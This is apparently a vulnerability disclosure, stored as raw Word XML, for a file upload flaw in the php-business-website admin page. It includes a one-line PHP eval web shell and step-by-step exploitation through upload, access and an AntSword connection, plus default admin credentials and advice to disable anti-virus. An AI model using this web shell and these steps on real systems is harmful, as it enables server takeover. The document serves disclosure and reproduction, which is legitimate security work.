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4A96E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># php-business-website has a File Upload Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245CC8AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02D58F90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>The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vulnerability exists in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9D1F64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`php-business-website-main/php-business-website-main/admin/about.php`, with the following relevant code snippets (from config.php):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD6DE3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7561C3FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>move_uploaded_file($_FILES['image']['tmp_name'], $target_path);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F4B0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$target_path = "../assets/img/$new_image_name";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B28B41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$new_image_name = uniqid() . '-' . basename($image);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D34ADF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$image = $_FILES['image']['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5587FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52136CAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7427CBAA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76515D62">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if($_SERVER['REQUEST_METHOD'] == 'POST')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C3DA64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if(isset($_POST['update_about']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C92307">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if($image)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016FFD8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0947F0DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD6AD52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>## Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44461FCB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>The code only judges whether to upload a file by "the existence of a file name ($image)" and does not verify the real type, suffix, or content of the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297C49B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- It does not verify the file suffix (e.g., not restricting to only legal image suffixes like .jpg/.png/.gif);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A61B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- It does not verify the file MIME type (not checking if $_FILES['image']['type'] is an image type such as image/jpeg/image/png);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FF08FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- It does not verify through file content (e.g., checking the file header identifier to prevent attackers from disguising malicious script files as images, such as renaming malicious.php to malicious.jpg for upload).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB019F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252DDB65">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>If the server configures script execution permissions for the assets/img directory, attackers can upload malicious scripts disguised as images. Accessing the file will trigger code execution, leading to server intrusion risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F74FE5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8F359F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Therefore, the edit function on the page `http://aaa/admin/about.php?updated=true` has a file upload vulnerability. (Anti-virus software needs to be disabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4007E3C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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1610" cy="2959735"/>
            <wp:effectExtent l="0" t="0" r="11430" b="12065"/>
            <wp:docPr id="4" name="图片 4" descr="72d77afa1acfc24b3a6297cdff0ac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72d77afa1acfc24b3a6297cdff0ac02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8F9D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79244F1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>## Exploitation Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7713EA80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>### Step 1: Create a One-Sentence Trojan PHP File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E6A7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F426190">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;?php @eval($_POST['attack']);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2360C580">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34490E1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A558234">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>### Step 2: Upload the File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D2067A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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3040" cy="2980690"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="13" name="图片 13" descr="1002406350afbbde185bbdd67d0d73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002406350afbbde185bbdd67d0d73b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C0E62">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>The file is successfully uploaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FE2766">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D640887">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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7325" cy="1336675"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>
            <wp:docPr id="15" name="图片 15" descr="ceb993645b03a23f9bae426b43494a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ceb993645b03a23f9bae426b43494a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EC478">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>### Step 3: Access the Uploaded File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A42E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93EB30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1414145"/>
            <wp:effectExtent l="0" t="0" r="8255" b="3175"/>
            <wp:docPr id="16" name="图片 16" descr="c7593475d90e560617c19f884244a8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c7593475d90e560617c19f884244a87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60D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>### Step 4: Connect with AntSword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA01135">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791FD0DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Successfully connected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5153D2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3422650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="17" name="图片 17" descr="3f2636630c4a0ae17b7d3adb83a1f4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3f2636630c4a0ae17b7d3adb83a1f4c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ED5F0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526155"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="18" name="图片 18" descr="625b4b775f007fa275eb0f71da7457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625b4b775f007fa275eb0f71da74576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FE069">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43FFEBAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>## Project Setup and Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F312110">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>### Download Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5267DFD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://github.com/Iqbolshoh/php-business-website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C07EB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F9F23E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>### Directory Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1597C102">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262245" cy="2980690"/>
            <wp:effectExtent l="0" t="0" r="1079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A1B9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>### Setup Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AB7B8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. Start the Apache (or Nginx) and MySQL services of phpstudy. You can start them directly through the phpstudy control panel. Confirm that both are "Started".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E87439">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2. Place the project files in a single project folder under the www root directory of phpstudy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A7FCC6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3. Create a website in phpstudy with the root directory set to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F00E56D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D:/phpstudy_pro/WWW/php-business-website-main/php-business-website-main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D344A6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>It is recommended to use PHP version 7.0.x.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4AE9FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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3860165"/>
            <wp:effectExtent l="0" t="0" r="1905" b="10795"/>
            <wp:docPr id="5" name="图片 5" descr="2b903e0d-f9d8-4daa-bc27-effb63bf18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b903e0d-f9d8-4daa-bc27-effb63bf18d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3D780">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4. Create a database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18741C3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>In phpMyAdmin, create a new database named business_website (or any name you prefer), then import the database.sql file from the root directory of the repository. (If business_website already exists, delete the first line of database.sql before creating it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D502730">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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3779520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="307453bf-09cd-488b-8881-a4cd851fa4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07453bf-09cd-488b-8881-a4cd851fa4e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74E0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6361AD8A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5. Modify the configuration file config.php to be consistent with the database you created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C698CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="1668145"/>
            <wp:effectExtent l="0" t="0" r="6985" b="825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66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D4485">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A632217">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6. Open the website backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6635C577">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://your-defined-domain-name/admin/login/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367936C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Username: Iqbolshoh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B04B9D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Default Password: IQBOLSHOH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9298EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF12C57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="2847340"/>
            <wp:effectExtent l="0" t="0" r="8890" b="254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8C24B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7. (Anti-virus software needs to be disabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3DF6CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC73620">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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1610" cy="2959735"/>
            <wp:effectExtent l="0" t="0" r="11430" b="12065"/>
            <wp:docPr id="19" name="图片 19" descr="72d77afa1acfc24b3a6297cdff0ac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72d77afa1acfc24b3a6297cdff0ac02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4F895">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>### Repeat Exploitation Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C822F1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. Write a one-sentence Trojan PHP file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EBCAD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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429125" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="20" name="图片 20" descr="e5197bd7df2fb2af7d6f7e2c5bbbf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e5197bd7df2fb2af7d6f7e2c5bbbf70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7F0EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2. Upload the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475E03EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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3040" cy="2980690"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="21" name="图片 21" descr="1002406350afbbde185bbdd67d0d73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1002406350afbbde185bbdd67d0d73b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42D61">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>The file is successfully uploaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E176F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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7325" cy="1336675"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>
            <wp:docPr id="22" name="图片 22" descr="ceb993645b03a23f9bae426b43494a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ceb993645b03a23f9bae426b43494a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0DF87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3. Try to access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29859101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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1414145"/>
            <wp:effectExtent l="0" t="0" r="8255" b="3175"/>
            <wp:docPr id="23" name="图片 23" descr="c7593475d90e560617c19f884244a8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c7593475d90e560617c19f884244a87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CC411">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4. Connect with AntSword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1035FB6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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3422650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="24" name="图片 24" descr="3f2636630c4a0ae17b7d3adb83a1f4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3f2636630c4a0ae17b7d3adb83a1f4c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4B466">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Successfully connected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7035A339">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C73C68">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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526155"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="25" name="图片 25" descr="625b4b775f007fa275eb0f71da7457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625b4b775f007fa275eb0f71da74576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AD2D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46076"/>
    <w:rsid w:val="0CCE60AC"/>
    <w:rsid w:val="0D022FD5"/>
    <w:rsid w:val="0EC7610A"/>
    <w:rsid w:val="104D16B2"/>
    <w:rsid w:val="11CD06B9"/>
    <w:rsid w:val="182B19A1"/>
    <w:rsid w:val="1A8D7DA0"/>
    <w:rsid w:val="1BC149D8"/>
    <w:rsid w:val="200E038C"/>
    <w:rsid w:val="261B1A43"/>
    <w:rsid w:val="2F6B12EF"/>
    <w:rsid w:val="2FF7375F"/>
    <w:rsid w:val="35E2126E"/>
    <w:rsid w:val="36AC46BE"/>
    <w:rsid w:val="379A653D"/>
    <w:rsid w:val="38EE0D7F"/>
    <w:rsid w:val="38F50127"/>
    <w:rsid w:val="3FF325AA"/>
    <w:rsid w:val="41171FF0"/>
    <w:rsid w:val="4A954692"/>
    <w:rsid w:val="5067010A"/>
    <w:rsid w:val="509A136D"/>
    <w:rsid w:val="533C64E3"/>
    <w:rsid w:val="58F9535E"/>
    <w:rsid w:val="5DED2A1D"/>
    <w:rsid w:val="5EE17067"/>
    <w:rsid w:val="60DF746E"/>
    <w:rsid w:val="63B75221"/>
    <w:rsid w:val="66CD4D5B"/>
    <w:rsid w:val="6A917936"/>
    <w:rsid w:val="6B240B57"/>
    <w:rsid w:val="6D443C83"/>
    <w:rsid w:val="7A442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2025-11-06T10:09:57Z</dcterms:created>
  <dc:creator>14766</dc:creator>
  <cp:lastModifiedBy>路人马</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-06T10:20:12Z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eyJoZGlkIjoiYTg3ZDg4YTQ0OWE2NjJiYWY3MjEwMGZmMDRjNDk5MTkiLCJ1c2VySWQiOiIxNDY4MjE4MTMyIn0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>BD34EB046EAE48049218FEE427C96858_12</vt:lpwstr>
  </property>
</Properties>
</file>